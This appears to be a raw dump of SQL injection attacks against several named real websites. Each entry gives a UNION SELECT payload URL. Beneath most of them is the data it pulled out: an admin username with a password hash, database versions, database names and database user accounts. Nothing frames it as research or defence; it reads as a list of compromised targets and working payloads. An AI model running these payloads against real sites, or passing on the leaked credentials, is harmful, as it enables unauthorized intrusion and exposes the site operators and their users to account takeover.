http://ej.kubagro.ru/a/viewaut.asp?id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,12,13+from+news

Microsoft JET Database Engine

http://www.fig.gr/index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

admin:b86104f63387af1ccb1d049223680a2c

http://www.amherst250.org {PR 4}
http://www.amherst250.org/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9,10,11/*

4.1.20 : amherst250bs : fclerk@localhost

------------------------------------------------------------------------------------------------

http://www.newcastlemusic.com {PR 4}
http://www.newcastlemusic.com/artists.php?ID=-2340+union+select+1,concat_ws(0x3a,version(),datab ase(),user())/*

4.1.22-log : agoodwi_newcastlemusic : agoodwi_nmsite@bsd8.qnetau.com